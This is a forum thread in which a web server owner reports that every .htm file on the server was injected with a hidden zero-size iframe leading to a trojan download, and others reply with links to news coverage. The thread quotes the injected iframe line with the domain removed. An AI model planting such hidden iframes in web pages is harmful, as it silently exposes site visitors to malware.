Server infected by a trojan

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View
Hi folks,
Hoping someone here might be able to give some advice on an infection.
Today at around 9:42am my local time one of my web servers got infected
somehow. What ever infected it then scanned through all .htm files on
the server and added the following line near the bottom of each one.

I've removed the domain name:-
<iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
height=0></iframe>


So, any time someone tried to view a site on my server they were also
directed to a Trojan download.

I have since removed these lines from all the .htm files but I have no
idea how someone managed to run a program on my server that inserted all
these lines.

Obviously I'm no expert on security etc but I have tried to make sure my
firewall is up to a reasonable standard and also have Norton AV
Corporate running on the server.

Any advice/help is much appreciated.


Re: Server infected by a trojan

On this special day, s wrote:

Quoted text here. Click to load it

Maybe it is related to this incident

http://www.heise-security.co.uk/news/95591


Gabriele Neukam

Gabriele.Spamfighter.Neukam@t-online.de

--
Quoted text here. Click to load it
(Roger Hunt in uk.comp.vintage)
In a want it now instantly straight away world - no :-)
(Krustov in ucv)



Re: Server infected by a trojan

Gabriele Neukam wrote:
Quoted text here. Click to load it

It could well be related, I really don't know.
What I don't understand is how hackers get the server to run something
that then scan's all the .htm files and injects the iframe line.


Re: Server infected by a trojan

Quoted text here. Click to load it

Maybe reading this will enlighten you some(Google is your friend):

Virus Attack on web server
Iframe code getting added to each page request:
http://www.webmasterworld.com/microsoft_asp_net/3279736.htm

large-scale web attacks targeting sites and their users:
http://arstechnica.com/news.ars/post/20070618-security-researchers-uncover-massive-attack-on-italian-web-sites.html

-jen



Site Timeline